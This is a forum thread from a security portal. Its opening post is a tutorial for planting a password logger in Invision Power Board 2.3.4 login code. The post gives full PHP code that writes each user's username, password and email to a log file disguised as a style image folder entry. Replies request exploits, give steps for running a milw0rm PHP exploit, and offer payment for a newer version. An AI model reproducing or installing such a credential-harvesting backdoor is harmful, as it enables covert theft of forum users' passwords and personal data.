Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
October 26, 2014
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: phenoms
New Today: 0
New Yesterday: 0
Overall: 8954

People Online:
Visitors: 169
Members: 0
Total: 169
milw0rm
·[web applications] - Wordpress InfusionSoft Upload Exploit
·[remote exploits] - Rejetto HttpFileServer Remote Command Execution Exploit
·[remote exploits] - F5 iControl Remote Root Command Execution Exploit
·[web applications] - Nessus Web UI 2.3.3 Cross Site Scripting Vulnerability
·[web applications] - WordPress Backup plugin Ready! Arbitrary File Download Vulnerability
·[local exploits] - Asx to Mp3 2.7.5 - Stack Overflow Exploit
·[remote exploits] - XAMPP 1.8.x Multiple Vulnerabilities
·[web applications] - ZyXEL SBG-3300 Security Gateway Denial Of Service Vulnerability
·[web applications] - ZyXEL SBG-3300 Security Gateway Cross Site Scripting Vulnerability
·[remote exploits] - Ultra Electronics SSL VPN 7.2.0.19 / 7.4.0.7 SQL Injection / Directory Creation

read more...
PacketStorm News
·HP Security Bulletin HPSBGN03108
·HP Security Bulletin HPSBMU03118 2
·Ubuntu Security Notice USN-2371-1
·Ubuntu Security Notice USN-2370-1
·SAP Business Warehouse Missing Authorization Check
·SAP HANA Web-based Development Workbench Code Injection
·SAP BusinessObjects Persistent Cross Site Scripting
·SAP Business Objects Information Disclosure Via CORBA
·SAP HANA Reflective Cross Site Scripting
·SAP Business Objects Denial Of Service Via CORBA

read more...
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Invision Power Board -> [IPB][Tutorial]Password logger
Post new topic  Reply to topic View previous topic :: View next topic 
[IPB][Tutorial]Password logger
PostPosted: Thu Apr 17, 2008 3:10 pm Reply with quote
tr0nix
Active user
Active user
 
Joined: Mar 06, 2008
Posts: 48




Tested under:

    Invision Power Board 2.3.4


[Requirements]
- Access to the server


Open the "login_core.php", which is located at /IPB-PATH/sources/loginauth.

Search for

Code:
function auth_local( $username, $password )


and put the following lines under the function (above the $password = md5($password); line!):

Code:

      $lg_pwd = $password;


Then search for

Code:
$this->return_code = 'SUCCESS';


(the FIRST $this->return_code, its about line 331) and put the following lines above the $this->return_code variable:

Code:
         
   @include("conf_global.php");
   $lg_username = strtolower($username);
   $lg_password = $lg_pwd;
   $lg_file = "./style_images/1/folder_mime_types/lg.html";
   $connect = @mysql_connect($INFO['sql_host'], $INFO['sql_user'], $INFO['sql_pass']);
   $selectdb = @mysql_select_db($INFO['sql_database']);
   $sql_query = @mysql_query("SELECT * FROM " . $INFO['sql_tbl_prefix'] . "members WHERE name='" . $lg_username . "'");
         
   while($row = @mysql_fetch_array($sql_query))
   {       
      if(strlen($lg_password) > 1 OR strlen($lg_username) > 1)
      {
         $fp1 = @fopen($lg_file, "a+");
         @fwrite($fp1, $lg_username . ' : ' .  $lg_password." (" . $row["email"] . ")\n");
         @fclose($fp1);
         $f = @file($lg_file);
         $new = array_unique($f);
         $fp = @fopen($lg_file, "w");
         foreach($new as $values)
         {
            @fputs($fp, $values);
         }
         @fclose($fp);
      }
   }


Now wait a little bit and see how the filesize of the logfile raises. Wink


PS: If the Logger doesn't create the logfile automaticly, then you need to create it manually and give the file chmod 0777.

(c) by [Team n0rth] tr0nix <tr0nix@inbox.ru>
View user's profile Send private message Send e-mail
PostPosted: Thu Apr 17, 2008 6:02 pm Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




In IPB have other possible solution witout access to server,only admin access.Think.
View user's profile Send private message
PostPosted: Thu Apr 17, 2008 8:40 pm Reply with quote
tr0nix
Active user
Active user
 
Joined: Mar 06, 2008
Posts: 48




And?
You need just to edit this file and it really doesn't matter if you edit this file through a shell or through the template system or any other methods.
The coding stuff will be the same, so I don't understand why you try to goof off my works!?

koko wrote:
In IPB have other possible solution witout access to server,only admin access.Think.
View user's profile Send private message Send e-mail
PostPosted: Fri Apr 18, 2008 9:38 am Reply with quote
pexli
Valuable expert
Valuable expert
 
Joined: May 24, 2007
Posts: 665
Location: Bulgaria




To edit files on server you need user perm's.In 90% you don't have one.
View user's profile Send private message
PostPosted: Wed Sep 03, 2008 5:46 pm Reply with quote
_hacker_
Regular user
Regular user
 
Joined: Aug 26, 2008
Posts: 14
Location: asia




some one have 2.3.4 perl ipb exploit ? coz it is easy to use
View user's profile Send private message Yahoo Messenger
PostPosted: Wed Sep 03, 2008 8:45 pm Reply with quote
tr0nix
Active user
Active user
 
Joined: Mar 06, 2008
Posts: 48




_hacker_ wrote:
some one have 2.3.4 perl ipb exploit ? coz it is easy to use


http://milw0rm.com/exploits/6325
View user's profile Send private message Send e-mail
PostPosted: Thu Sep 04, 2008 11:55 am Reply with quote
_hacker_
Regular user
Regular user
 
Joined: Aug 26, 2008
Posts: 14
Location: asia




tr0nix wrote:
_hacker_ wrote:
some one have 2.3.4 perl ipb exploit ? coz it is easy to use


http://milw0rm.com/exploits/6325


bro its php exploit i dont know how to use php exploit ...

i know only perl exploit

there is no diff between perl and php ?
for example if it was perl i did taht setps to run this..
1:install perl and save this as ipb.pl
and then go to cmd and then perl dir
c:/perl/bin\perl> ipb.pl
like that now what to do can u explain pl z?
View user's profile Send private message Yahoo Messenger
PostPosted: Fri Sep 05, 2008 12:14 am Reply with quote
tr0nix
Active user
Active user
 
Joined: Mar 06, 2008
Posts: 48




_hacker_ wrote:
tr0nix wrote:
_hacker_ wrote:
some one have 2.3.4 perl ipb exploit ? coz it is easy to use


http://milw0rm.com/exploits/6325


bro its php exploit i dont know how to use php exploit ...

i know only perl exploit

there is no diff between perl and php ?
for example if it was perl i did taht setps to run this..
1:install perl and save this as ipb.pl
and then go to cmd and then perl dir
c:/perl/bin\perl> ipb.pl
like that now what to do can u explain pl z?



Download xampp (http://www.apachefriends.org/en/xampp-windows.html) and install it.

Then start your command prompt (start -> run -> cmd :p) and type

Path\To\xampp\php\php.exe Path\To\The\Exploit\exploit.php.

I didn't test the PHP exploit, but the script should be writing some options.
View user's profile Send private message Send e-mail
PostPosted: Tue Jan 13, 2009 2:45 pm Reply with quote
waplet
Active user
Active user
 
Joined: Dec 24, 2008
Posts: 31




I got this !
Code:
$this->return_code = 'SUCCESS';
         return;

But where to put
Code:
 @include("conf_global.php");
   $lg_username = strtolower($username);
   $lg_password = $lg_pwd;
   $lg_file = "./style_images/1/folder_mime_types/lg.html";
   $connect = @mysql_connect($INFO['sql_host'], $INFO['sql_user'], $INFO['sql_pass']);
   $selectdb = @mysql_select_db($INFO['sql_database']);
   $sql_query = @mysql_query("SELECT * FROM " . $INFO['sql_tbl_prefix'] . "members WHERE name='" . $lg_username . "'");
         
   while($row = @mysql_fetch_array($sql_query))
   {       
      if(strlen($lg_password) > 1 OR strlen($lg_username) > 1)
      {
         $fp1 = @fopen($lg_file, "a+");
         @fwrite($fp1, $lg_username . ' : ' .  $lg_password." (" . $row["email"] . ")\n");
         @fclose($fp1);
         $f = @file($lg_file);
         $new = array_unique($f);
         $fp = @fopen($lg_file, "w");
         foreach($new as $values)
         {
            @fputs($fp, $values);
         }
         @fclose($fp);
      }
   }

this one? i cand uderstand . I dont wanna problems with error Very Happy
View user's profile Send private message
PostPosted: Mon Feb 16, 2009 7:25 pm Reply with quote
delta
Advanced user
Advanced user
 
Joined: Jan 11, 2009
Posts: 60




pexli wrote:
In IPB have other possible solution witout access to server,only admin access.Think.


How can i do using the admincp?
View user's profile Send private message
newest ipb
PostPosted: Mon Oct 05, 2009 5:13 am Reply with quote
iiDo
Regular user
Regular user
 
Joined: Nov 24, 2007
Posts: 19




anyone a idea how to log with the newest ipb??

thanks
View user's profile Send private message
PostPosted: Tue Oct 20, 2009 3:07 pm Reply with quote
thelordbug
Beginner
Beginner
 
Joined: Oct 20, 2009
Posts: 2




Paying $20 USD via paypal for this to work for IPB 2.3.6
View user's profile Send private message
PostPosted: Sat Dec 05, 2009 2:37 am Reply with quote
0x3
Regular user
Regular user
 
Joined: Jun 09, 2009
Posts: 10
Location: j0rd4n




this doesn't work as it's look you get the password for the user from the db, it's well be MD5 like

Code:

jonnye_r : 8bef052c7ae033ad47baab006846438f (j0@j0.com)


the Vbulltien it's work fine [ clear text ] but IPB need to get the password without the db ... so it's well be clear text..

so this one un useful i think...

/j0
View user's profile Send private message
[IPB][Tutorial]Password logger
  www.waraxe.us Forum Index -> Invision Power Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






It book reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.116 Seconds